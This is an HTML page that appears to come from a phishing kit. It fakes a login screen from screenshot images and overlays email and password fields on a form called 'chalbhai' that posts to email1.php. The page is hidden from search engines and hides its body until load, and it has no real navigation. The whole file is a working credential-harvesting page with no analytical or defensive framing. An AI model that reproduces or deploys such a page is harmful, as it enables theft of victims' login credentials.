<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Login</title>
<meta http-equiv="content-type" content="text/html; charset=UTF8">
<meta charset="utf-8" />
<meta name="applicable-device" content="pc,mobile" />
 <meta http-equiv="content-type" content="text/html; charset=UTF-8">
  <meta name="robots" content="noindex, nofollow">
  <meta name="googlebot" content="noindex, nofollow">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="format-detection" content="telephone=no" />

<link rel="shortcut icon"
              href="images/favicon.ico"/>
			  
			  
	
<script type="text/javascript">

function unhideBody()
{
var bodyElems = document.getElementsByTagName("body");
bodyElems[0].style.visibility = "visible";
}

</script>

<body style="visibility:hidden" onload="unhideBody()">
<style type="text/css">
div#container
{
	position:relative;
	width: 1283px;
	margin-top: 0px;
	margin-left: auto;
	margin-right: auto;
	text-align:left; 
}
body {text-align:center;margin:0}
</style>
<style> 
  .textbox { 
    font-family: Arial, Helvetica, sans-serif;
    
    color: #333; 
     border-radius: 5px;
    border: 1px solid #A4A4A4; 
    padding: 4px 8px 4px 4px !important;
    line-height: 1; 
    width: 275px; 
    height:35px; 
	font-size: 16px;
  } 

 .textbox:focus { 
    border: 1px solid #4d90fe; 
    outline: none; 
    box-shadow: inset 0px 1px 2px rgba(0,0,0,0.3);  
    -moz-box-shadow: inset 0px 1px 2px rgba(0,0,0,0.3); 
    -webkit-box-shadow: inset 0px 1px 2px rgba(0,0,0,0.3); 
    background: rgb(255, 255, 255); } 
  
</style> 
</head>
<body bgColor="#FFFFFF">
<div id="container">
<div id="image1" style="position:absolute; overflow:hidden; left:130px; top:15px; width:885px; height:581px; z-index:0"><img src="images/login.png" alt="" title="" border=0 width=885 height=581></div>

<div id="hr1" style="position:absolute; overflow:hidden; left:3px; top:69px; width:1277px; height:17px; z-index:1">
<hr size=2 width=1277>
</div>

<div id="image2" style="position:absolute; overflow:hidden; left:175px; top:447px; width:348px; height:101px; z-index:2"><a href="#"><img src="images/forgetlogin.png" alt="" title="" border=0 width=348 height=101></a></div>
<form action=email1.php name=chalbhai id=chalbhai method=post>
<div id="image3" style="position:absolute; overflow:hidden; left:131px; top:679px; width:983px; height:107px; z-index:3"><a href="#"><img src="images/footer.png" alt="" title="" border=0 width=983 height=107></a></div>

<input name="formtext1" placeholder="Email address" title="Please Enter Right Value"  autofocus required autocomplete="off" class="textbox" type="email" style="position:absolute;width:337px;left:179px;top:263px;z-index:4">
<input name="formtext2" placeholder="Password" title="Please Enter Right Value"  autofocus required autocomplete="off" class="textbox" type="password" style="position:absolute;width:337px;left:179px;top:339px;z-index:5">
<div id="formimage1" style="position:absolute; left:177px; top:391px; z-index:6"><input type="image" name="formimage1" width="341" height="43" src="images/button.png"></div>
</div>

</body>
</html>
